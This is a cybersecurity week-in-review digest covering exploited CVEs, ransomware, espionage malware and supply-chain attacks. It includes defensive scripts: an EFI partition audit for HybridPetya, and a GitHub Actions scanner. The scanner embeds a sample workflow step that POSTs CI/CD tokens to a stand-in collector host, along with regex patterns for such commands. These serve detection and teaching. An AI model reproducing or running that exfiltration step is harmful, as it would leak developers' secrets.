Cyber Security Week in Review: September 12, 2025


Threat actors linked to the Akira ransomware group have ramped up attacks on SonicWall devices, exploiting a known high-severity vulnerability to gain initial access to networks. The attacks leverage CVE-2024-40766, an improper access control flaw in SonicOS management access and SSL VPN. SonicWall has confirmed the exploitation, ties it to local user account credentials that were carried over during firewall migrations without being reset, and has warned customers of escalating brute-force attempts against exposed devices.

Microsoft has released its September 2025 Patch Tuesday updates, fixing more than 80 vulnerabilities. Two were publicly disclosed before the release: CVE-2025-55234, an elevation-of-privilege flaw in Windows SMB Server that is exposed through relay attacks, and CVE-2024-21907, a denial-of-service bug in the Newtonsoft.Json library shipped with Microsoft SQL Server.

The US Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-5086, a critical vulnerability in Dassault Systèmes DELMIA Apriso Manufacturing Operations Management (MOM) software, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, a deserialization of untrusted data issue affecting Release 2020 through Release 2025, can allow remote code execution.

Samsung has patched a critical remote code execution vulnerability, CVE-2025-21043, that was exploited in zero-day attacks on its Android devices. The flaw is an out-of-bounds write in libimagecodec.quram.so, a closed-source image parsing library from Quramsoft; it affects devices running Android 13 or later and lets an attacker execute code remotely through a malicious image. It was reported to Samsung by the security teams at Meta and WhatsApp on August 13.

A critical flaw in SAP S/4HANA, a widely used Enterprise Resource Planning (ERP) platform, is now under active exploitation in the wild. The vulnerability, CVE-2025-42957, is an ABAP code injection flaw reachable over RFC that lets a low-privileged authenticated user run arbitrary code; SAP patched it in its August 2025 security update. Security researchers warn that attackers are now using it to compromise systems that have not applied the fix.

Cybersecurity firm Kroll has uncovered an espionage campaign using a malware strain dubbed Gonepostal, attributed to the Russia-linked group Kroll tracks as KTA007 (also known as Fancy Bear, APT28 and Pawn Storm). Gonepostal targets Microsoft Outlook and uses email for command-and-control (C2) traffic, effectively turning the mail client into a backdoor.

ESET Research has found a new ransomware strain, HybridPetya, on VirusTotal. It mimics the infamous Petya/NotPetya malware but is adapted to modern UEFI-based systems: it installs a malicious EFI application on the EFI System Partition and encrypts the Master File Table of NTFS partitions. On systems that have not received the corresponding UEFI dbx revocation, it can bypass Secure Boot by exploiting CVE-2024-7344 with a specially crafted cloak.dat file. Unlike NotPetya, HybridPetya currently shows no signs of spreading in the wild and lacks aggressive network propagation capabilities.
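A defender-side check for the ESP tampering described above, added here as an example (it is not ESET's code): it hashes every EFI binary on a mounted EFI System Partition, flags any that is not on an allowlist, and flags a cloak.dat file wherever it appears. EXPECTED_EFI is an assumed allowlist, and the directory tree the demo builds is constructed so the script runs without a real ESP.

```python
"""Audit a mounted EFI System Partition for unexpected EFI binaries and for the
cloak.dat file HybridPetya is reported to drop.

Added example for this digest, not ESET's code. EXPECTED_EFI is an assumed
allowlist (adjust it to the bootloaders you actually deploy); build_sample_esp()
writes a constructed directory tree so demo() runs without a real ESP.
"""
import hashlib
import json
import sys
import tempfile
from pathlib import Path

# Assumed allowlist: ESP-relative paths, lower-cased, POSIX separators.
EXPECTED_EFI = {
    "efi/boot/bootx64.efi",
    "efi/microsoft/boot/bootmgfw.efi",
    "efi/microsoft/boot/bootmgr.efi",
}
SUSPECT_NAMES = {"cloak.dat"}   # artefact named in the HybridPetya report


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_esp(root) -> dict:
    """Walk the ESP: hash every .efi, flag those off the allowlist and any suspect names."""
    root = Path(root)
    result = {"unexpected_efi": [], "suspect_files": [], "efi_hashes": {}}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix().lower()
        if rel.endswith(".efi"):
            result["efi_hashes"][rel] = sha256_file(path)
            if rel not in EXPECTED_EFI:
                result["unexpected_efi"].append(rel)
        if path.name.lower() in SUSPECT_NAMES:
            result["suspect_files"].append(rel)
    result["unexpected_efi"].sort()
    result["suspect_files"].sort()
    return result


def build_sample_esp(base) -> None:
    """Constructed sample tree: one allowlisted loader plus two planted files.
    File names and contents are made up for the demo (reloader.efi is a constructed name)."""
    sample = {
        "EFI/Microsoft/Boot/bootmgfw.efi": b"MZ legitimate boot manager (fake bytes)",
        "EFI/Microsoft/Boot/reloader.efi": b"MZ planted EFI application (fake bytes)",
        "EFI/Microsoft/Boot/cloak.dat": b"\x00" * 32,
    }
    for rel, data in sample.items():
        target = Path(base) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)


def demo() -> dict:
    """Build the constructed ESP in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_esp(tmp)
        return scan_esp(tmp)


if __name__ == "__main__":
    # Usage: python esp_audit.py /boot/efi   (no argument: run the constructed demo)
    print(json.dumps(scan_esp(sys.argv[1]) if len(sys.argv) > 1 else demo(), indent=2))
```

On Linux the ESP is usually mounted at /boot/efi; on Windows, `mountvol S: /S` exposes it as a drive letter to run the same scan against. Compare the reported hashes with a known-good baseline rather than relying on the allowlist alone, and independently confirm that the firmware's dbx includes the CVE-2024-7344 revocation that shipped in Microsoft's January 2025 Secure Boot update, since the bypass only works where that revocation is missing.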

APT37 (aka ScarCruft, Ruby Sleet and Velvet Chollima) has been observed running a coordinated malware campaign against Windows systems, managing multiple payloads from a single C2 server, according to a new report from Zscaler ThreatLabz. The campaign, active since June 2025, includes a new Rust-based backdoor named Rustonotto (aka CHILLYCHINO) alongside Chinotto, a PowerShell backdoor in use since 2019, and FadeStealer, a surveillance tool first seen in 2023. FadeStealer is capable of keylogging, screen and audio capture, device monitoring, and data exfiltration via encrypted RAR archives.

In a separate report, Zscaler examines a malware campaign targeting Chinese-speaking users that has been active since early May 2025. The campaign delivers three Remote Access Trojans (RATs): ValleyRAT, FatalRAT, and a new RAT dubbed 'kkRAT'. The latter shares code with Gh0st RAT and Big Bad Wolf, both commonly associated with China-based cybercriminal groups.

A previously unknown fileless malware framework called EggStreme has been used to compromise a Philippines-based military company. According to Bitdefender, the multi-stage toolset enables persistent and stealthy espionage, using DLL sideloading and in-memory code injection. Its core component is a backdoor called 'EggStremeAgent', capable of system reconnaissance, lateral movement, and data theft via a keylogger. While the campaign's goals align with known Chinese APT operations, Bitdefender has not found enough evidence to link the activity to a specific group.

Bitdefender has also observed a malvertising campaign that distributes fake ‘Meta Verified’ browser extensions called SocialMetrics Pro. The extensions, advertised through malicious ads and hosted on the legitimate cloud platform Box, falsely promise users a verified blue check badge on Facebook and Instagram. In reality, the extensions are designed to steal sensitive data by collecting session cookies and IP addresses, which are then sent to a Telegram bot controlled by the attackers.

A new malicious campaign is using ConnectWise ScreenConnect, a legitimate remote access tool, to deploy AsyncRAT, a remote access trojan. Attackers gain access through trojanized ScreenConnect installers sent via phishing emails, often disguised as financial documents. Once inside, they manually execute a multi-layered VBScript and PowerShell loader that fetches obfuscated .NET components, ultimately delivering AsyncRAT. Persistence is maintained through a fake ‘Skype Updater’ scheduled task.

Straiker's AI Research (STAR) team has detailed Villager, a Chinese-developed AI-powered penetration testing framework comparable to Cobalt Strike. Created by the Cyberspike red-team project, Villager combines Kali Linux toolsets with DeepSeek AI models to automate attack workflows, significantly lowering the barrier to entry for attackers. The tool, published on PyPI.org, has been downloaded roughly 10,000 times in two months. The researchers warn that Villager could follow the path of Cobalt Strike and become the next go-to tool for cybercriminals.

Kharon Research released a report on the inner workings of the US-sanctioned Chinese companies linked to the Salt Typhoon state-sponsored cyber espionage group. Additionally, cyber threat intelligence firm Silent Push has identified 45 previously unreported domains used by Salt Typhoon.

A threat actor accidentally exposed their operations by installing Huntress security software on their own device after clicking a Google ad. During a free trial, Huntress logged their activity, confirming their identity through device and browser data. Over three months, the actor tested security tools, used automation platforms, and explored AI for phishing and data management. Logs showed research into Evilginx servers, proxy services, financial targets, and identity-focused tools, along with frequent use of Google Translate and visits to dark web forums such as STYX.

Recorded Future’s Insikt Group has uncovered a new threat actor, dubbed ‘TAG-150’, active since at least March 2025. TAG-150 maintains a large and complex infrastructure, including both victim-facing Tier 1 servers used to control various malware and multi-layered backend servers for support and resilience. The group has deployed several likely self-developed malware families, including CastleLoader, CastleBot, and the recently discovered CastleRAT, a remote access trojan (RAT) capable of gathering system data, executing commands, and deploying additional malware.

Cybersecurity researchers at Arctic Wolf have spotted a new malware campaign, dubbed "GPUGate", that leverages Google Ads, GitHub infrastructure, and GPU-based decryption to bypass traditional defenses: the payload only decrypts on a machine with a real GPU, so GPU-less analysis sandboxes never see the final stage. The threat actors used malvertising to place fake ads at the top of Google search results, luring users into downloading what appeared to be GitHub Desktop. Instead of a legitimate GitHub release, users were redirected via links embedded in a compromised GitHub repository to a malicious domain.

A major supply chain attack dubbed 'GhostAction' has compromised 327 GitHub accounts and exposed thousands of secrets across the software development ecosystem. The attack, which took place earlier this month, injected malicious GitHub Actions workflows into 817 repositories. The workflows were designed to exfiltrate secrets from continuous integration and deployment (CI/CD) pipelines, including PyPI, npm, and DockerHub tokens, via HTTP POST requests to a remote server controlled by the attackers.
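A detection pass for the exfiltration pattern described above, added here as an example (it is not code from the GhostAction write-up or from any scanner project): it splits each workflow file into steps and flags a step that both references `${{ secrets.* }}` and runs a command that POSTs to a host outside an assumed allowlist. The two workflows embedded in it are constructed samples, and TRUSTED_HOSTS is an assumption to adjust for your own pipelines.

```python
"""Flag GitHub Actions steps that read secrets and POST to an external host, the
pattern the GhostAction workflows used to exfiltrate CI/CD tokens.

Added example for this digest, not code from the GhostAction report. It is a regex
heuristic over raw YAML (no PyYAML needed); BENIGN and MALICIOUS are constructed
samples and TRUSTED_HOSTS is an assumed allowlist.
"""
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_]\w*)\s*\}\}")
# Commands able to send a request body: curl with a data/form/upload flag or an
# explicit POST, wget --post-*, PowerShell web cmdlets, python requests.post.
OUTBOUND_POST = re.compile(
    r"curl\b[^\n]*?(?:\s-d\b|--data\S*|\s-F\b|-X\s*POST|--upload-file)"
    r"|wget\b[^\n]*?--post-(?:data|file)"
    r"|Invoke-(?:WebRequest|RestMethod)\b[^\n]*?-Method\s+Post"
    r"|requests\.post\(",
    re.IGNORECASE,
)
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
TRUSTED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org"}


def split_steps(yaml_text):
    """Return each step's raw text: a step starts at '- ' at the step list's indentation."""
    steps, current, step_indent, in_steps = [], [], None, False
    for line in yaml_text.splitlines():
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if stripped.startswith("steps:"):
            in_steps, step_indent = True, None
            continue
        if not in_steps:
            continue
        if stripped.startswith("- ") and step_indent in (None, indent):
            step_indent = indent                      # a new step begins
            if current:
                steps.append("\n".join(current))
            current = [line]
        elif step_indent is not None and stripped and indent <= step_indent:
            steps.append("\n".join(current))          # dedented out of the step list
            current, in_steps, step_indent = [], False, None
        else:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps


def scan_workflow(yaml_text):
    """Steps that reference secrets AND post to a host outside TRUSTED_HOSTS."""
    findings = []
    for idx, step in enumerate(split_steps(yaml_text)):
        secrets = sorted(set(SECRET_REF.findall(step)))
        external = sorted({h.lower() for h in HOST.findall(step)} - TRUSTED_HOSTS)
        if secrets and external and OUTBOUND_POST.search(step):
            findings.append({"step": idx, "secrets": secrets, "hosts": external})
    return findings


# Constructed sample: a normal publish job that also POSTs to a trusted host.
BENIGN = """\
jobs:
  build:
    steps:
      - name: Publish
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
        run: twine upload dist/*
      - name: Notify
        run: >
          curl -X POST -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}"
          https://api.github.com/repos/acme/tool/releases
"""

# Constructed sample mimicking the reported pattern (collector host is made up).
MALICIOUS = """\
jobs:
  release:
    steps:
      - name: Collect
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
        run: |
          curl -s -X POST -d "pypi=$PYPI_TOKEN&npm=$NPM_TOKEN&docker=$DOCKERHUB_TOKEN" https://collector.example.invalid/ingest
      - name: Publish
        run: npm publish
"""


def demo():
    """Scan both constructed samples; only MALICIOUS should produce a finding."""
    return {"benign": scan_workflow(BENIGN), "malicious": scan_workflow(MALICIOUS)}


if __name__ == "__main__":
    print(demo())   # for real use: scan_workflow(open(".github/workflows/x.yml").read())
```

The Notify step in the benign sample shows why the host allowlist matters: a `curl -X POST` carrying `secrets.GITHUB_TOKEN` to api.github.com is routine and must not fire. The heuristic's blind spot is a job-level `env:` mapping, which sits outside the step text, so a secret mapped there and used as `$VAR` inside a step is missed; extend the scanner to fold job-level env into each step if your workflows use that style. The structural fix is to leave fewer long-lived tokens in the pipeline at all, for example PyPI trusted publishing over OIDC instead of a stored API token.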

In an unrelated incident, threat actors compromised a maintainer's account and injected malware into several popular npm packages that are collectively downloaded more than 2.6 billion times per week. The injected code runs in the browser when users visit affected web applications; it silently watches for cryptocurrency wallet addresses and transactions involving Ethereum, Bitcoin, Solana, Tron, Litecoin, and Bitcoin Cash, and swaps the destination addresses for attacker-controlled ones.

Also, cybersecurity researchers at Akamai have discovered a new variant of a cryptojacking campaign targeting exposed Docker APIs. The attackers route their traffic through the Tor network for anonymity and exploit misconfigured Docker instances to install an XMRig cryptocurrency miner.

Researchers from ETH Zurich have discovered VMScape, a new Spectre-like attack that allows a malicious VM to leak cryptographic keys from an unmodified QEMU hypervisor on AMD and Intel CPUs. The attack bypasses existing mitigations and doesn't require host compromise. It affects all AMD CPUs from Zen 1 to Zen 5 and Intel's Coffee Lake, but not newer architectures like Raptor Cove or Gracemont.

The US Department of Justice has charged Ukrainian national Volodymyr Viktorovich Tymoshchuk, accused of being a key administrator behind major ransomware operations including LockerGoga, MegaCortex, and Nefilim. Tymoshchuk allegedly helped carry out attacks that affected hundreds of companies globally, causing millions in damages. He remains at large and has been placed on the EU's Most Wanted list, with US authorities offering a reward of up to $10 million for information about him.

In an unrelated case, Liridon Masurica of Kosovo pleaded guilty to conspiracy for running the criminal marketplace BlackDB.cc and faces up to 10 years in prison.

Separately, an employee at a multinational DVD company was sentenced to over four years for stealing and selling pre-release blockbuster films.

Finnish cybercriminal Aleksanteri Kivimäki, convicted of more than 20,000 counts of attempted extortion after hacking the Vastaamo psychotherapy center, has been released from custody pending appeal. The Helsinki Court of Appeal ordered his release because of his lengthy pretrial detention, though his six-year, three-month sentence stands during the appeal process. Kivimäki, previously convicted as a teenager for his involvement with the hacking gang Lizard Squad, was arrested in France in 2023 and extradited to Finland. The Vastaamo case is one of Europe's most significant data breaches.

